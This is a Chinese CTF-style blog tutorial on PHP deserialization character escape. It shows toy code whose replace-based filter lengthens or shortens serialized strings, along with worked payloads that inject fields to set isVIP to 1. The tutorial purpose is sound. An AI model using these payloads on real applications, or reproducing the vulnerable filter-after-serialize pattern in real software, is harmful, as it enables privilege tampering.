php反序列化字符逃逸

已于 2023-01-05 13:24:42 修改
阅读量1.2k 收藏 13
点赞数 3
分类专栏: CTF 文章标签: php 安全 服务器
于 2023-01-04 19:09:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61839115/article/details/128552987
版权

文章目录

php反序列化字符逃逸

php反序列化字符逃逸的原理

当开发者使用先将对象序列化,然后将对象中的字符进行过滤,最后再进行反序列化。这个时候就有可能会产生PHP反序列化字符逃逸的漏洞。

php反序列化字符逃逸分类

过滤后字符变多

过滤后字符变少

过滤后字符变多

我们先定义一个类 user ,成员变量 usernamepasswordisVIP,并且序列化

<?php
class user{
	public $username;
	public $password;
	public $isVIP;

	public function __construct($u,$p){
		$this->username = $u;
		$this->password = $p;
		$this->isVIP = 0;
	}
}
$obj = new user('admin','123456');
$obj = serialize($obj);
echo $obj;

输出:

O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

我们可以看到,我们user类的对象默认 isVIP=0,并且不受传入参数的影响

这时我们增加一个过滤:

function filter($obj) {
    return preg_replace("/admin/","hacker",$obj);
}

完整代码:

<?php
class user
{
    public $username;
    public $password;
    public $isVIP;

    public function __construct($u, $p)
    {
        $this->username = $u;
        $this->password = $p;
        $this->isVIP = 0;
    }
}

function filter($obj) {
    return preg_replace("/admin/","hacker",$obj);
}

$obj = new user('admin','123456');
$obj = filter(serialize($obj));
echo $obj;

输出:

O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

此时,admin在序列化串中已经变成了 hacker ,并且字符串长度比5多了一个,变成了6

我们对比一下两次的输出:

O:4:"user":3:{s:8:"username";s:5:"admin";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}//过滤前
O:4:"user":3:{s:8:"username";s:5:"hacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;} //过滤后

我们想要构造,将 isVIP的值变成 1,如何才能做到呢?admin位置现有字串与目标字串如下:

";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;} //现有字串
";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} //目标字串

我们知道,传入的admin位置是可控变量 ,所以我们需要在该位置插入目标字串,

目标字串的 "; 将admin参数位置处的双引号闭合,即可造成字符逃逸

但是我们admin参数位置处的字符串长度对应不上,由于我们需要逃逸出来的字符串为:

";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} 其长度为47.

这就导致我们admin传参位置的参数少了47长度,必须再添加47长度才行,但是怎么添加呢?

我们知道,每次过滤的时候,admin 会变为:hacker 长度加了1,所以我们传参时可以重复47次 admin。这样我们的参数就会增加47长度,再减去逃逸的47长度字符串,长度就合适了。

可控变量修改如下:

adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}

完整的代码为:

<?php
class user
{
    public $username;
    public $password;
    public $isVIP;

    public function __construct($u, $p)
    {
        $this->username = $u;
        $this->password = $p;
        $this->isVIP = 0;
    }
}

function filter($obj) {
    return preg_replace("/admin/","hacker",$obj);
}
$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}', "123456");
$a = serialize($a);
echo $a.PHP_EOL;
$a = filter($a);
echo $a;
print_r(unserialize($a));

输出:

O:4:"user":3:{s:8:"username";s:282:"adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}
O:4:"user":3:{s:8:"username";s:282:"hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}user Object
(
    [username] => hackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhackerhacker
    [password] => 123456
    [isVIP] => 1
)

反序列化后,多余的子串会被抛弃, 在大括号 } 之外的原先字串就被抛弃了:

";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

我们观察反序列化之后的输出 isVIP=1,反序列化字符串逃逸已经成功了。

过滤后字符串变少

我们将上面过滤参数中 hacker 改为 hack,其余代码不变:

<?php
class user
{
    public $username;
    public $password;
    public $isVIP;

    public function __construct($u, $p)
    {
        $this->username = $u;
        $this->password = $p;
        $this->isVIP = 0;
    }
}

function filter($obj) {
    return preg_replace("/admin/","hack",$obj);
}

$obj = new user('admin','123456');
$obj = filter(serialize($obj));
echo $obj;

输出:

O:4:"user":3:{s:8:"username";s:5:"hack";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

发现如果username值存在admin,会被替换为 hack ,长度减一

此处输出的username值的长度已经不符合5了

我们也要想办法构造,使得 isVIP=1 ,我们对比一下现有子串和目标子串:(长度为47)

";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;} //现有
";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;} //目标

php反序列化有一个特性:

当序列化字符串属性的长度不够时,会往后走,直到长度与规定的长度相等为止.

例如,此处序列化字符串属性值 hack 的长度为4,但是原本属性长度为5,所以会往后走1位,属性值为: hack" 把后面的双引号也算进去了。也就是说不根据双引号判断一个字符串是否已经结束,而是根据前面规定的数量来读取字符串。

我们计算一下本可控变量末尾到下一可控变量的长度

";s:8:"password";s:6:"   //长度为22

因为每次过滤都会少一个字符,我们先将 admin重复22遍:

<?php
class user{
public $username;
public $password;
public $isVIP;

public function __construct($u,$p){
$this->username = $u;
$this->password = $p;
$this->isVIP = 0;
}
}

function filter($s){
return str_replace("admin","hack",$s);
}

$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin','123456');
$a_seri = serialize($a);
$a_seri_filter = filter($a_seri);

echo $a_seri_filter;

输出:

{s:8:"username";s:105:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:6:"123456";s:5:"isVIP";i:0;}

img

也就是说123456这个地方成为了我们的可控变量,在123456可控变量的位置中添加我们的目标子串

";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}	//目标子串

即:

$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin','";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}');

我们构造对象,序列化后过滤,再输出:

O:4:"user":3:{s:8:"username";s:105:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:47:"";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}

仔细观察这一串字符串可以看到紫色方框内一共107个字符,但是前面只有显示105

20210820131653.png

造成这种现象的原因是:替换之前我们目标子串的位置是123456,一共6个字符,替换之后我们的目标子串显然超过10个字符,所以会造成计算得到的payload不准确

解决办法是:多添加2admin,这样就可以补上缺少的字符。长度再减2

最终代码:

<?php
class user{
public $username;
public $password;
public $isVIP;

public function __construct($u,$p){
$this->username = $u;
$this->password = $p;
$this->isVIP = 0;
}
}

function filter($s){
return str_replace("admin","hack",$s);
}

$a = new user('adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin','";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}');
$a_seri = serialize($a);
$a_seri_filter = filter($a_seri);

echo $a_seri_filter;

输出结果:

O:4:"user":3:{s:8:"username";s:115:"hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:47:"";s:8:"password";s:6:"123456";s:5:"isVIP";i:1;}";s:5:"isVIP";i:0;}

image-20210820130134043

这样长度就对上了。我们将反序列化后的对象输出:

user Object
(
    [username] => hackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhackhack";s:8:"password";s:47:"
    [password] => 123456
    [isVIP] => 1
)

此时 isVIP=1 ,字符逃逸成功!

参考文章:

PHP反序列化字符逃逸详解

Tr4n
关注
  • 3
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
php反序列化逃逸1
08-03
总之,PHP反序列化逃逸是攻击者可能利用的安全漏洞,它依赖于对序列化字符串的操控,特别是属性的数量、长度和内容。防止这种逃逸的方法包括对输入数据进行严格的验证和过滤,以及避免在不受信任的数据流中使用`...
PHP反序列化字符串逃逸
v2ish1yan的博客
04-15 1705
php反序列化字符串逃逸
php反序列化逃逸
最新发布
m0_63416413的博客
04-25 500
ctf反序列化逃逸,结合代码和ctf题目
php反序列化-字符串逃逸-增减多个字符
m0_61867082的博客
07-29 298
众所周知php反序列化字符串逃逸,分为2种类型(字符串增多,字符串减少)。但网上大多数文章讲的都是增加一个字符或者减少一个字符串。对于增加减少多个字符串进行逃逸的文章,却少有人提及。本篇文章在特定源码的基础上,对增加减少多个字符串的情况进行简单分析。需要你有一定的字符串逃逸理论基础。如有错误欢迎批评指正。先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面。先说结论,此题不可以,除非两个可控属性之间有调整的空间,具体看下面。假设前提必须使用admin才行。假设前提必须使用admin才行。
PHP反序列化漏洞详解.rar
02-07
在IT安全领域,PHP反序列化漏洞是一种常见的安全隐患,尤其在Web应用开发中。这个话题在CTF(Capture The Flag)网络安全竞赛中也常被用作挑战,因为理解和利用这种漏洞需要深入理解PHP语言和其内部工作原理。下面将...
php反序列化长度变化尾部字符串逃逸(0CTF-2016-piapiapia)
10-15
PHP反序列化长度变化尾部字符串逃逸】是一种安全漏洞利用技术,通常出现在使用PHP的系统中。在PHP中,对象序列化是将对象转换为可存储或传输的字符串的过程,而反序列化则是将这个字符串恢复为原始对象的过程。...
shiro反序列化测试工具.zip
06-04
在网络安全领域,"反序列化漏洞"是一种常见的安全问题,攻击者可以通过构造恶意的序列化数据来执行远程代码或者获取敏感信息。Shiro框架在处理用户认证和授权时可能会涉及对象的序列化反序列化,因此也可能存在...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化反序列化过程中的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
PHP 反序列化字符串逃逸
On_the_road_TJJ的博客
09-06 236
PHP反序列化字符串逃逸,个人理解。
php反序列化学习——字符串逃逸
m0_73756016的博客
03-13 1005
如果我们通过构造使其里面的内容为'hkhk";s:4:"pass";s:xx:"' 这样我们通过构造可控变量pass的值 让它后面变成s:3:"vip";这里的思路也是通过构造让后面的k变成‘ ";s:4:"pass";这里user的字符串已经从flagflag 替换成了hkhk 但是字符串长度还是8 这样 他就会以为user里面的内容为‘hkhk";s:4:"pass";}就会结束 就相当于后面s:1:"b";s:4:"pass";
反序列化中的字符逃逸问题
XYH_233的博客
03-27 265
php反序列化中的字符逃逸问题
PHP反序列化字符逃逸
weixin_72667582的博客
06-28 156
php反序列化字符逃逸
CTF-PHP反序列化漏洞5-反序列化字符逃逸
Eason_LYC安全白帽子的成长博客
05-15 1767
PHP反序列化漏洞是指攻击者通过构造恶意序列化数据,使得PHP反序列化函数在反序列化时执行了恶意代码,从而导致安全漏洞。其中,反序列化字符逃逸是指攻击者在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。具体来说,PHP反序列化函数在反序列化时,会对序列化字符串中的特殊字符进行转义,例如将双引号转义为\”、将反斜杠转义为\等。攻击者可以利用这个特性,在构造恶意序列化数据时,使用特殊字符来绕过PHP反序列化函数的检查,从而实现攻击的目的。?
PHP反序列化字符逃逸详解
蚁景网安学院
08-24 424
原创稿件征集邮箱:edu@antvsion.comQQ:3200599554黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析稿件通过并发布还能收获200-800元不等的...
php反序列化学习之字符串逃逸
oyf3085227433的博客
02-13 1155
学习一下php反序列化字符串逃逸的知识点
fastjson反序列化字符串数组
03-03
下面是一个示例代码,演示了如何使用Fastjson反序列化字符串数组: ```java import com.alibaba.fastjson.JSON; public class Main { public static void main(String[] args) { String jsonString = "[\"string...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值